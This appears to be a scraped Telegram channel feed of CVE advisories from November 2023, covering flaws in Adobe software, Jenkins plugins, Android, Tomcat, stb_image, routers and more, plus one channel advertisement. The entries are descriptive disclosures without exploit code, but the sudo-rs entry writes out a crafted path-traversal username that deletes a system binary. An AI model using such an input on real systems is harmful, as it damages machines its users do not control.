🚨 CVE-2023-22268Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could lead to information disclosure by an low-privileged authenticated attacker. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-11-17 13:25:42 |
🚨 CVE-2023-6112Use after free in Navigation in Google Chrome prior to 119.0.6045.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-11-17 13:25:41 |
🚨 CVE-2023-41239Server-Side Request Forgery (SSRF) vulnerability in Blubrry PowerPress Podcasting plugin by Blubrry.This issue affects PowerPress Podcasting plugin by Blubrry: from n/a through 11.0.6.🎖@cveNotify |
|
| 2023-11-17 13:25:40 |
🚨 CVE-2023-41983The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.1, Safari 17.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Processing web content may lead to a denial-of-service.🎖@cveNotify |
|
| 2023-11-17 12:25:40 |
🚨 CVE-2020-11447An issue was discovered on Bell HomeHub 3000 SG48222070 devices. Remote authenticated users can retrieve the serial number via cgi/json-req - this is an information leak because the serial number is intended to prove an actor's physical access to the device.🎖@cveNotify |
|
| 2023-11-17 11:25:46 |
🚨 CVE-2023-47073Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-11-17 11:25:45 |
🚨 CVE-2023-47071Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-11-17 11:25:42 |
🚨 CVE-2023-47070Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-11-17 11:25:41 |
🚨 CVE-2023-47068Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-11-17 11:25:40 |
🚨 CVE-2023-47066Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-11-17 10:25:40 |
🚨 CVE-2023-5444A Cross Site Request Forgery vulnerability in ePolicy Orchestrator prior to 5.10.0 CP1 Update 2 allows a remote low privilege user to successfully add a new user with administrator privileges to the ePO server. This impacts the dashboard area of the user interface. To exploit this the attacker must change the HTTP payload post submission, prior to it reaching the ePO server.🎖@cveNotify |
|
| 2023-11-17 09:25:41 |
🚨 CVE-2023-47757Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in AWeber AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth allows Accessing Functionality Not Properly Constrained by ACLs, Cross-Site Request Forgery.This issue affects AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth: from n/a through 7.3.9.🎖@cveNotify |
|
| 2023-11-17 09:25:40 |
🚨 CVE-2023-44325Adobe Animate versions 23.0.2 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-11-07 06:31:14 |
Do you enjoy reading this channel?Perhaps you have thought about placing ads on it?To do this, follow three simple steps:1) Sign up: https://telega.io/c/cveNotify2) Top up the balance in a convenient way3) Create an advertising postIf the topic of your post fits our channel, we will publish it with pleasure. |
|
| 2023-11-04 10:52:26 |
🚨 CVE-2023-45661stb_image is a single file MIT licensed library for processing images. A crafted image file may trigger out of bounds memcpy read in `stbi__gif_load_next`. This happens because two_back points to a memory address lower than the start of the buffer out. This issue may be used to leak internal memory allocation information.🎖@cveNotify |
|
| 2023-11-04 10:52:24 |
🚨 CVE-2023-45662stb_image is a single file MIT licensed library for processing images. When `stbi_set_flip_vertically_on_load` is set to `TRUE` and `req_comp` is set to a number that doesn’t match the real number of components per pixel, the library attempts to flip the image vertically. A crafted image file can trigger `memcpy` out-of-bounds read because `bytes_per_pixel` used to calculate `bytes_per_row` doesn’t match the real image array dimensions.🎖@cveNotify |
|
| 2023-11-04 10:52:23 |
🚨 CVE-2023-45663stb_image is a single file MIT licensed library for processing images. The stbi__getn function reads a specified number of bytes from context (typically a file) into the specified buffer. In case the file stream points to the end, it returns zero. There are two places where its return value is not checked: In the `stbi__hdr_load` function and in the `stbi__tga_load` function. The latter of the two is likely more exploitable as an attacker may also control the size of an uninitialized buffer.🎖@cveNotify |
|
| 2023-11-04 10:52:21 |
🚨 CVE-2023-45664stb_image is a single file MIT licensed library for processing images. A crafted image file can trigger `stbi__load_gif_main_outofmem` attempt to double-free the out variable. This happens in `stbi__load_gif_main` because when the `layers * stride` value is zero the behavior is implementation defined, but common that realloc frees the old memory and returns null pointer. Since it attempts to double-free the memory a few lines below the first “free”, the issue can be potentially exploited only in a multi-threaded environment. In the worst case this may lead to code execution.🎖@cveNotify |
|
| 2023-11-04 10:52:20 |
🚨 CVE-2023-45666stb_image is a single file MIT licensed library for processing images. It may look like `stbi__load_gif_main` doesn’t give guarantees about the content of output value `*delays` upon failure. Although it sets `*delays` to zero at the beginning, it doesn’t do it in case the image is not recognized as GIF and a call to `stbi__load_gif_main_outofmem` only frees possibly allocated memory in `*delays` without resetting it to zero. Thus it would be fair to say the caller of `stbi__load_gif_main` is responsible to free the allocated memory in `*delays` only if `stbi__load_gif_main` returns a non null value. However at the same time the function may return null value, but fail to free the memory in `*delays` if internally `stbi__convert_format` is called and fails. Thus the issue may lead to a memory leak if the caller chooses to free `delays` only when `stbi__load_gif_main` didn’t fail or to a double-free if the `delays` is always freed🎖@cveNotify |
|
| 2023-11-04 10:52:19 |
🚨 CVE-2023-45667stb_image is a single file MIT licensed library for processing images.If `stbi__load_gif_main` in `stbi_load_gif_from_memory` fails it returns a null pointer and may keep the `z` variable uninitialized. In case the caller also sets the flip vertically flag, it continues and calls `stbi__vertical_flip_slices` with the null pointer result value and the uninitialized `z` value. This may result in a program crash.🎖@cveNotify |
|
| 2023-11-04 10:52:17 |
🚨 CVE-2023-45675stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds write in `f->vendor[len] = (char)'\0';`. The root cause is that if the len read in `start_decoder` is `-1` and `len + 1` becomes 0 when passed to `setup_malloc`. The `setup_malloc` behaves differently when `f->alloc.alloc_buffer` is pre-allocated. Instead of returning `NULL` as in `malloc` case it shifts the pre-allocated buffer by zero and returns the currently available memory block. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-11-04 10:52:15 |
🚨 CVE-2023-4822Grafana is an open-source platform for monitoring and observability. The vulnerability impacts Grafana instances with several organizations, and allows a user with Organization Admin permissions in one organization to change the permissions associated with Organization Viewer, Organization Editor and Organization Admin roles in all organizations.It also allows an Organization Admin to assign or revoke any permissions that they have to any user globally.This means that any Organization Admin can elevate their own permissions in any organization that they are already a member of, or elevate or restrict the permissions of any other user.The vulnerability does not allow a user to become a member of an organization that they are not already a member of, or to add any other users to an organization that the current user is not a member of.🎖@cveNotify |
|
| 2023-11-04 10:52:14 |
🚨 CVE-2023-42795Incomplete Cleanup vulnerability in Apache Tomcat.When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next.Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.🎖@cveNotify |
|
| 2023-11-04 10:52:12 |
🚨 CVE-2023-45648Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.🎖@cveNotify |
|
| 2023-11-04 10:52:10 |
🚨 CVE-2023-43785A vulnerability was found in libX11 due to a boundary condition within the _XkbReadKeySyms() function. This flaw allows a local user to trigger an out-of-bounds read error and read the contents of memory on the system.🎖@cveNotify |
|
| 2023-11-04 10:52:09 |
🚨 CVE-2023-43786A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.🎖@cveNotify |
|
| 2023-11-04 10:52:08 |
🚨 CVE-2023-43787A vulnerability was found in libX11 due to an integer overflow within the XCreateImage() function. This flaw allows a local user to trigger an integer overflow and execute arbitrary code with elevated privileges.🎖@cveNotify |
|
| 2023-11-04 10:52:06 |
🚨 CVE-2023-29499A flaw was found in GLib. GVariant deserialization fails to validate that the input conforms to the expected format, leading to denial of service.🎖@cveNotify |
|
| 2023-11-04 10:52:05 |
🚨 CVE-2023-25586A flaw was found in Binutils. A logic fail in the bfd_init_section_decompress_status function may lead to the use of an uninitialized variable that can cause a crash and local denial of service.🎖@cveNotify |
|
| 2023-11-04 10:52:04 |
🚨 CVE-2023-25584An out-of-bounds read flaw was found in the parse_module function in bfd/vms-alpha.c in Binutils.🎖@cveNotify |
|
| 2023-11-04 10:52:03 |
🚨 CVE-2023-25588A flaw was found in Binutils. The field `the_bfd` of `asymbol`struct is uninitialized in the `bfd_mach_o_get_synthetic_symtab` function, which may lead to an application crash and local denial of service.🎖@cveNotify |
|
| 2023-11-04 10:52:01 |
🚨 CVE-2023-32005A vulnerability has been identified in Node.js version 20, affecting users of the experimental permission model when the --allow-fs-read flag is used with a non-* argument.This flaw arises from an inadequate permission model that fails to restrict file stats through the `fs.statfs` API. As a result, malicious actors can retrieve stats from files that they do not have explicit read access to.This vulnerability affects all users using the experimental permission model in Node.js 20.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2023-11-04 10:52:00 |
🚨 CVE-2023-42467QEMU through 8.0.0 could trigger a division by zero in scsi_disk_reset in hw/scsi/scsi-disk.c because scsi_disk_emulate_mode_select does not prevent s->qdev.blocksize from being 256. This stops QEMU and the guest immediately.🎖@cveNotify |
|
| 2023-11-04 05:52:24 |
🚨 CVE-2023-21351In Activity Manager, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:23 |
🚨 CVE-2023-21352In NFA, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:21 |
🚨 CVE-2023-21353In NFA, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:20 |
🚨 CVE-2023-21354In Package Manager Service, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:19 |
🚨 CVE-2023-21355In libaudioclient, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:18 |
🚨 CVE-2023-21356In Bluetooth, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:17 |
🚨 CVE-2023-21357In NFC, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:16 |
🚨 CVE-2023-21358In UWB Google, there is a possible way for a malicious app to masquerade as system app com.android.uwb.resources due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:15 |
🚨 CVE-2023-21359In Bluetooth, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure in the Bluetooth server with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:13 |
🚨 CVE-2023-21360In Bluetooth, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:12 |
🚨 CVE-2023-21361In Bluetooth, there is a possibility of code-execution due to a use after free. This could lead to paired device escalation of privilege in the privileged Bluetooth process with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-04 05:52:11 |
🚨 CVE-2023-42456Sudo-rs, a memory safe implementation of sudo and su, allows users to not have to enter authentication at every sudo attempt, but instead only requiring authentication every once in a while in every terminal or process group. Only once a configurable timeout has passed will the user have to re-authenticate themselves. Supporting this functionality is a set of session files (timestamps) for each user, stored in `/var/run/sudo-rs/ts`. These files are named according to the username from which the sudo attempt is made (the origin user).An issue was discovered in versions prior to 0.2.1 where usernames containing the `.` and `/` characters could result in the corruption of specific files on the filesystem. As usernames are generally not limited by the characters they can contain, a username appearing to be a relative path can be constructed. For example we could add a user to the system containing the username `../../../../bin/cp`. When logged in as a user with that name, that user could run `sudo -K` to clear their session record file. The session code then constructs the path to the session file by concatenating the username to the session file storage directory, resulting in a resolved path of `/bin/cp`. The code then clears that file, resulting in the `cp` binary effectively being removed from the system.An attacker needs to be able to login as a user with a constructed username. Given that such a username is unlikely to exist on an existing system, they will also need to be able to create the users with the constructed usernames.The issue is patched in version 0.2.1 of sudo-rs. Sudo-rs now uses the uid for the user instead of their username for determining the filename. Note that an upgrade to this version will result in existing session files being ignored and users will be forced to re-authenticate. It also fully eliminates any possibility of path traversal, given that uids are always integer values.The `sudo -K` and `sudo -k` commands can run, even if a user has no sudo access. As a workaround, make sure that one's system does not contain any users with a specially crafted username. While this is the case and while untrusted users do not have the ability to create arbitrary users on the system, one should not be able to exploit this issue.🎖@cveNotify |
|
| 2023-11-04 05:52:09 |
🚨 CVE-2020-36653A vulnerability was found in GENI Portal. It has been rated as problematic. Affected by this issue is some unknown functionality of the file portal/www/portal/error-text.php. The manipulation of the argument error leads to cross site scripting. The attack may be launched remotely. The patch is identified as c2356cc41260551073bfaa3a94d1ab074f554938. It is recommended to apply a patch to fix this issue. VDB-218474 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-11-04 05:52:08 |
🚨 CVE-2020-36654A vulnerability classified as problematic has been found in GENI Portal. This affects the function no_invocation_id_error of the file portal/www/portal/sliceresource.php. The manipulation of the argument invocation_id/invocation_user leads to cross site scripting. It is possible to initiate the attack remotely. The patch is named 39a96fb4b822bd3497442a96135de498d4a81337. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218475.🎖@cveNotify |
|
| 2023-11-04 05:52:07 |
🚨 CVE-2020-36651A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation leads to path traversal. The identifier of the patch is c4c0f0138ab5afbac58e03915d446680421bde28. It is recommended to apply a patch to fix this issue. The identifier VDB-218461 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-11-04 05:52:06 |
🚨 CVE-2021-4312** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic has been found in Th3-822 Rapidleech. This affects the function zip_go of the file classes/options/zip.php. The manipulation of the argument archive leads to cross site scripting. It is possible to initiate the attack remotely. The patch is named 885a87ea4ee5e14fa95801eca255604fb2e138c6. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218295. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-11-04 05:52:04 |
🚨 CVE-2021-4313A vulnerability was found in NethServer phonenehome. It has been rated as critical. This issue affects the function get_info/get_country_coor of the file server/index.php. The manipulation leads to sql injection. The identifier of the patch is 759c30b0ddd7d493836bbdf695cf71624b377391. It is recommended to apply a patch to fix this issue. The identifier VDB-218393 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-11-04 05:52:03 |
🚨 CVE-2019-25105A vulnerability, which was classified as problematic, was found in dro.pm. This affects an unknown part of the file web/fileman.php. The manipulation of the argument secret/key leads to cross site scripting. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named fa73c3a42bc5c246a1b8f815699ea241aef154bb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-221763.🎖@cveNotify |
|
| 2023-11-04 05:52:02 |
🚨 CVE-2017-20182A vulnerability was found in Mobile Vikings Django AJAX Utilities up to 1.2.1 and classified as problematic. This issue affects the function Pagination of the file django_ajax/static/ajax-utilities/js/pagination.js of the component Backslash Handler. The manipulation of the argument url leads to cross site scripting. The attack may be initiated remotely. The patch is named 329eb1dd1580ca1f9d4f95bc69939833226515c9. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-222611.🎖@cveNotify |
|
| 2023-11-04 05:52:01 |
🚨 CVE-2023-22812SanDisk PrivateAccess versions prior to 6.4.9 support insecure TLS 1.0 and TLS 1.1 protocols which are susceptible to man-in-the-middle attacks thereby compromising confidentiality and integrity of data.🎖@cveNotify |
|
| 2023-11-03 20:22:20 |
🚨 CVE-2022-34794Missing permission checks in Jenkins Recipe Plugin 1.2 and earlier allow attackers with Overall/Read permission to send an HTTP request to an attacker-specified URL and parse the response as XML.🎖@cveNotify |
|
| 2023-11-03 20:22:19 |
🚨 CVE-2022-34785Jenkins build-metrics Plugin 1.3 and earlier does not perform permission checks in multiple HTTP endpoints, allowing attackers with Overall/Read permission to obtain information about jobs otherwise inaccessible to them.🎖@cveNotify |
|
| 2023-11-03 20:22:17 |
🚨 CVE-2022-34789A cross-site request forgery (CSRF) vulnerability in Jenkins Matrix Reloaded Plugin 1.1.3 and earlier allows attackers to rebuild previous matrix builds.🎖@cveNotify |
|
| 2023-11-03 20:22:16 |
🚨 CVE-2022-34793Jenkins Recipe Plugin 1.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-11-03 20:22:15 |
🚨 CVE-2023-43655Composer is a dependency manager for PHP. Users publishing a composer.phar to a public web-accessible server where the composer.phar can be executed as a php file may be subject to a remote code execution vulnerability if PHP also has `register_argc_argv` enabled in php.ini. Versions 2.6.4, 2.2.22 and 1.10.27 patch this vulnerability. Users are advised to upgrade. Users unable to upgrade should make sure `register_argc_argv` is disabled in php.ini, and avoid publishing composer.phar to the web as this is not best practice.🎖@cveNotify |
|
| 2023-11-03 20:22:13 |
🚨 CVE-2022-34207A cross-site request forgery (CSRF) vulnerability in Jenkins Beaker builder Plugin 1.10 and earlier allows attackers to connect to an attacker-specified URL.🎖@cveNotify |
|
| 2023-11-03 20:22:12 |
🚨 CVE-2022-34205A cross-site request forgery (CSRF) vulnerability in Jenkins Jianliao Notification Plugin 1.1 and earlier allows attackers to send HTTP POST requests to an attacker-specified URL.🎖@cveNotify |
|
| 2023-11-03 20:22:11 |
🚨 CVE-2022-34206A missing permission check in Jenkins Jianliao Notification Plugin 1.1 and earlier allows attackers with Overall/Read permission to send HTTP POST requests to an attacker-specified URL.🎖@cveNotify |
|
| 2023-11-03 20:22:10 |
🚨 CVE-2022-34208A missing permission check in Jenkins Beaker builder Plugin 1.10 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL.🎖@cveNotify |
|
| 2023-11-03 20:22:09 |
🚨 CVE-2022-34209A cross-site request forgery (CSRF) vulnerability in Jenkins ThreadFix Plugin 1.5.4 and earlier allows attackers to connect to an attacker-specified URL.🎖@cveNotify |
|
| 2023-11-03 20:22:08 |
🚨 CVE-2022-34210A missing permission check in Jenkins ThreadFix Plugin 1.5.4 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL.🎖@cveNotify |
|
| 2023-11-03 20:22:07 |
🚨 CVE-2022-34211A cross-site request forgery (CSRF) vulnerability in Jenkins vRealize Orchestrator Plugin 3.0 and earlier allows attackers to send an HTTP POST request to an attacker-specified URL.🎖@cveNotify |
|
| 2023-11-03 20:22:06 |
🚨 CVE-2023-21382In Content Resolver, there is a possible method to access metadata about existing content providers on the device due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-03 20:22:04 |
🚨 CVE-2023-21383In Settings, there is a possible way for the user to unintentionally send extra data due to an unclear prompt. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2023-11-03 20:22:03 |
🚨 CVE-2023-21384In Package Manager, there is a possible possible permissions bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-11-03 20:22:02 |
🚨 CVE-2023-45573Buffer Overflow vulnerability in D-Link device DI-7003GV2.D1 v.23.08.25D1 and before, DI-7100G+V2.D1 v.23.08.23D1 and before, DI-7100GV2.D1 v.23.08.23D1, DI-7200G+V2.D1 v.23.08.23D1 and before, DI-7200GV2.E1 v.23.08.23E1 and before, DI-7300G+V2.D1 v.23.08.23D1, and DI-7400G+V2.D1 v.23.08.23D1 and before allows a remote attacker to execute arbitrary code via the n parameter of the mrclfile_del.asp function.🎖@cveNotify |
|
| 2023-11-03 20:22:00 |
🚨 CVE-2023-45580Buffer Overflow vulnerability in D-Link device DI-7003GV2.D1 v.23.08.25D1 and before, DI-7100G+V2.D1 v.23.08.23D1 and before, DI-7100GV2.D1 v.23.08.23D1, DI-7200G+V2.D1 v.23.08.23D1 and before, DI-7200GV2.E1 v.23.08.23E1 and before, DI-7300G+V2.D1 v.23.08.23D1, and DI-7400G+V2.D1 v.23.08.23D1 and before allows a remote attacker to execute arbitrary code via the wild/mx and other parameters of the ddns.asp function🎖@cveNotify |
|
| 2023-11-03 20:21:59 |
🚨 CVE-2022-34780A cross-site request forgery (CSRF) vulnerability in Jenkins XebiaLabs XL Release Plugin 22.0.0 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-11-03 20:21:58 |
🚨 CVE-2022-34779A missing permission check in Jenkins XebiaLabs XL Release Plugin 22.0.0 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-11-03 20:21:57 |
🚨 CVE-2022-34213Jenkins Squash TM Publisher (Squash4Jenkins) Plugin 1.0.0 and earlier stores passwords unencrypted in its global configuration file on the Jenkins controller where they can be viewed by users with access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-11-03 17:22:18 |
🚨 CVE-2023-31422An issue was discovered by Elastic whereby sensitive information is recorded in Kibana logs in the event of an error. The issue impacts only Kibana version 8.10.0 when logging in the JSON layout or when the pattern layout is configured to log the %meta pattern. Elastic has released Kibana 8.10.1 which resolves this issue. The error object recorded in the log contains request information, which can include sensitive data, such as authentication credentials, cookies, authorization headers, query params, request paths, and other metadata. Some examples of sensitive data which can be included in the logs are account credentials for kibana_system, kibana-metricbeat, or Kibana end-users.🎖@cveNotify |
|
| 2023-11-03 17:22:17 |
🚨 CVE-2023-46752An issue was discovered in FRRouting FRR through 9.0.1. It mishandles malformed MP_REACH_NLRI data, leading to a crash.🎖@cveNotify |
|
| 2023-11-03 17:22:16 |
🚨 CVE-2023-46753An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur for a crafted BGP UPDATE message without mandatory attributes, e.g., one with only an unknown transit attribute.🎖@cveNotify |
|
| 2023-11-03 17:22:15 |
🚨 CVE-2023-5752When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.🎖@cveNotify |
|
| 2023-11-03 17:22:13 |
🚨 CVE-2008-4302fs/splice.c in the splice subsystem in the Linux kernel before 2.6.22.2 does not properly handle a failure of the add_to_page_cache_lru function, and subsequently attempts to unlock a page that was not locked, which allows local users to cause a denial of service (kernel BUG and system crash), as demonstrated by the fio I/O tool.🎖@cveNotify |
|
| 2023-11-03 17:22:12 |
🚨 CVE-2022-34194Jenkins Readonly Parameter Plugin 1.0.0 and earlier does not escape the name and description of Readonly String and Readonly Text parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 17:22:11 |
🚨 CVE-2021-21613Jenkins TICS Plugin 2020.3.0.6 and earlier does not escape TICS service responses, resulting in a cross-site scripting (XSS) vulnerability exploitable by attackers able to control TICS service response content.🎖@cveNotify |
|
| 2023-11-03 17:22:10 |
🚨 CVE-2023-5088A bug in QEMU could cause a guest I/O operation otherwise addressed to an arbitrary disk offset to be targeted to offset 0 instead (potentially overwriting the VM's boot code). This could be used, for example, by L2 guests with a virtual disk (vdiskL2) stored on a virtual disk of an L1 (vdiskL1) hypervisor to read and/or write data to LBA 0 of vdiskL1, potentially gaining control of L1 at its next reboot.🎖@cveNotify |
|
| 2023-11-03 17:22:09 |
🚨 CVE-2023-5946The Digirisk plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'current_group_id' parameter in version 6.0.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-11-03 17:22:08 |
🚨 CVE-2023-5380A use-after-free flaw was found in the xorg-x11-server. An X server crash may occur in a very specific and legacy configuration (a multi-screen setup with multiple protocol screens, also known as Zaphod mode) if the pointer is warped from within a window on one screen to the root window of the other screen and if the original window is destroyed followed by another window being destroyed.🎖@cveNotify |
|
| 2023-11-03 17:22:06 |
🚨 CVE-2022-34191Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.77 and earlier does not escape the name of NetStorm Test parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 17:22:01 |
🚨 CVE-2022-34190Jenkins Maven Metadata Plugin for Jenkins CI server Plugin 2.1 and earlier does not escape the name and description of List maven artifact versions parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 17:22:00 |
🚨 CVE-2022-34188Jenkins Hidden Parameter Plugin 0.0.4 and earlier does not escape the name and description of Hidden Parameter parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 17:21:59 |
🚨 CVE-2022-34189Jenkins Image Tag Parameter Plugin 1.10 and earlier does not escape the name and description of Image Tag parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 17:21:58 |
🚨 CVE-2022-34193Jenkins Package Version Plugin 1.0.1 and earlier does not escape the name of Package version parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 10:22:12 |
🚨 CVE-2023-5948Improper Authorization in GitHub repository teamamaze/amazefileutilities prior to 1.91.🎖@cveNotify |
|
| 2023-11-03 10:22:11 |
🚨 CVE-2023-41351Chunghwa Telecom NOKIA G-040W-Q has a vulnerability of authentication bypass, which allows an unauthenticated remote attacker to bypass the authentication mechanism to log in to the device by an alternative URL. This makes it possible for unauthenticated remote attackers to log in as any existing users, such as an administrator, to perform arbitrary system operations or disrupt service.🎖@cveNotify |
|
| 2023-11-03 10:22:09 |
🚨 CVE-2023-41352Chunghwa Telecom NOKIA G-040W-Q has a vulnerability of insufficient filtering for user input. A remote attacker with administrator privilege can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system or terminate services.🎖@cveNotify |
|
| 2023-11-03 10:22:08 |
🚨 CVE-2023-41353Chunghwa Telecom NOKIA G-040W-Q has a vulnerability of weak password requirements. A remote attacker with regular user privilege can easily infer the administrator password from system information after logging system, resulting in admin access and performing arbitrary system operations or disrupt service.🎖@cveNotify |
|
| 2023-11-03 10:22:07 |
🚨 CVE-2023-41354Chunghwa Telecom NOKIA G-040W-Q Firewall function does not block ICMP TIMESTAMP requests by default, an unauthenticated remote attacker can exploit this vulnerability by sending a crafted package, resulting in partially sensitive information exposed to an actor.🎖@cveNotify |
|
| 2023-11-03 10:22:05 |
